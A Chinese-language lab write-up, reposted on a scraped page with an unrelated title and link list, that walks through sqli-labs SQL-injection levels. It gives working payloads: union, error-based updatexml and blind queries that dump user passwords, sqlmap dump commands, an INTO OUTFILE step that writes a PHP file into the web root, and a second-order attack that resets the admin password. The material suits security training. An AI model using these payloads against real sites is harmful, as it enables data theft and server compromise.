当前位置: 首页 > news >正文

网站建设 印花税打开网页就是2345网址导航

news 2025/9/16 15:45:19
网站建设 印花税,打开网页就是2345网址导航,快速seo优化,pc建站文章目录 总体思路:less-1:less-2:less-3:less-4:less-5:less-6:less-7:less-8:布尔盲注less-9:时间盲注less-21:less-24: 总体思路: 1、第一件事情 逃脱出单引号的控制 闭合单引号 2、单双引号需要成对出现 在python php Java中 3、2个办法 继续把多出…

文章目录

          • 总体思路:
            • less-1:
            • less-2:
            • less-3:
            • less-4:
            • less-5:
            • less-6:
            • less-7:
            • less-8:布尔盲注
            • less-9:时间盲注
            • less-21:
            • less-24:

总体思路:

1、第一件事情 逃脱出单引号的控制 闭合单引号
2、单双引号需要成对出现 在python php Java中
3、2个办法 继续把多出来的单引号闭合,要么注释掉单引号
4、MySQL注释符 – # /***/ */ url会编码# 要用%23绕过 规则:ord(‘#’) hex(35)
5、需要知道联合查询的列数 求当前表的列数(联表查询必须保证两个表列数一致)
6、需要order by 检测他的列数 列数3
7、让第一个表查询为空
8、最终目的 注入管理员账号密码
9、首先你要知道管理员表名 列名(利用MySQL自带的数据库information_shame)

less-1:

http://127.0.0.1/sqllabs/less-2/?id=1

less-2:

http://127.0.0.1/sqllabs/less-2/?id=1

less-3:

http://127.0.0.1/sqllabs/less-3/?id=1

less-4:

http://127.0.0.1/sqllabs/less-4/?id=1%27

less-5:

1、报错注入的突破口就是让页面上显示报错。
2、比如在本例中把查询参数的路径写错,页面上只会显示查询不到内容,但是不会报错。
3、但是如果把查询参数的格式符号写错,页面上就会提示出报错信息:
4、由于路径错误,报错信息中显示出了路径信息。
5、于是我们想到,如果在报错之前执行一下select语句,然后在报错提醒信息那里回显出我们想要的数据信息就好了,这//就是报错注入。

http://127.0.0.1/sqllabs/less-5/?id=1%27%20and%20updatexml(1,concat(0x7e,substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%203,1),1,32),0x7e),1)--%20   //查到表名
http://127.0.0.1/sqllabs/less-5/?id=1%27%20and%20updatexml(1,concat(0x7e,substr((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name%20=%20%27users%27%20limit%202,1),1,32),0x7e),1)--%20//查到列名
127.0.0.1/sqllabs/less-5/?id=1%27 and updatexml(1,concat(0x7e,substr((select group_concat(username,0x3a,password)from users),1,32),0x7e),1)--+

在这里插入图片描述

less-6:
sqlmap
less-7:

mysql注入webshell必须满足:
1、root权限
2、知道网站物理路径
3、secure_file_priv 为空(show variables like ‘%secure%’;)

id=1%27))union select 1,2,"<?php phpinfo();" into outfile "E:/phpstudy_pro/www/sqllabs/webshell.php";--+
less-8:布尔盲注
http://127.0.0.1/sqllabs/less-8/?id=1%27%20and%20ascii(substr((select%20database()),1,1))=115--+

我用sqlmap解出来的:

python sqlmap/sqlmap.py-u http://127.0.0.1/sqllabs/Less-8/?id=1 -dbs		//提取数据库
python sqlmap/sqlmap py-u http://127.0.0.1/sqllabs/ess-8/?id=1 -D security --tables//表名
python sqlmap/sqlmap.py -u http://127.0.0.1/sqllabs/Less-8/?id=1 -D security -T users --columns //列名
python sqlmap/sqlmap.pyu http://127.0.0.1/sqllabs/Less-8/?id=1 -D security -T users --dump -C "username,password"//用户名和密码
less-9:时间盲注
1' and if(ascii(substr(database(), %d, 1)) > %d, sleep(1), 0)--

less-10:
sqlmap

less-21:

我发现不输入正确的用户名和密码就拿不到cookie,由于我知道数据库,所以我尝试输入正确的用户名和密码就抓包,把post放了之后看到get包里的cookie,由于代码是对用户名先进行base64编码之后再进行解码,所以我在注入的时候先对我的uname进行sql代码的base64编码注入即可

截图如下:
在这里插入图片描述

less-24:

看源代码可知在用户修改密码时又注入sql可能,我先注册一个admin’#用户单引号用于合并,#用来注释后面的代码包括’,然后登录admin’#用户修改密码,再进入数据库中可以看到admin用户的密码被修改了

在这里插入图片描述

http://www.yayakq.cn/news/274721/

相关文章:

  • 北京推广网站wordpress+dns预读
  • 免费搭建自己的网站网站空间登录
  • 自己怎么做优惠卷网站wordpress反应
  • php做听歌网站工信网备案网站
  • 做网站如何设计数据库wordpress安装第二步
  • 哈尔滨巨耀网站建设重庆网站制作有哪些
  • wordpress仿站cmswordpress访问地址
  • 成套小说网站模板wordpress iframe插件
  • 中国建设银行晋中分行网站seoul是韩国哪个城市
  • 宁波专业网站定制制作服务网站超链接怎么做 word
  • 漳州建设局网站有个网站可以学做ppt模板
  • 电子商务网站开发公司网站后台php开发教程
  • 大健康网站怎么样做网络营销方案步骤
  • 公司网站如何制作设计手机上的免费销售网站建设
  • 电商网站流量统计品牌型网店
  • 蛋糕网站源码WordPress网页嵌入插件
  • 安徽省建设厅网站巅川建设有限公司微信公众号不能上传wordpress
  • 西部数码网站管理助手3.0渠道策略的四种方式
  • 计算机网站设计论文wordpress crafty cart
  • 企业建站公司是干嘛的大企业网站制作及维护
  • 做网站广告多少钱跨国浏览器
  • 手机网站页面设计要求海南千筑建设工程有限公司网站
  • 商城和营销型网站建设免费交友软件
  • 旅游门户网站方案dnsprefetch wordpress
  • 哈尔滨寸金网站建设价格网站制作怎样做
  • 顺德网站建设公司有哪些建立网站一般包括什么等方式
  • 网站建设费用摊销多少年专业的logo设计
  • 做淘宝客必须有网站吗云主机服务器
  • 广州大型网站制作公司电子商务网站推广案例
  • 玉溪网站建设现状苏州企业网站制作电话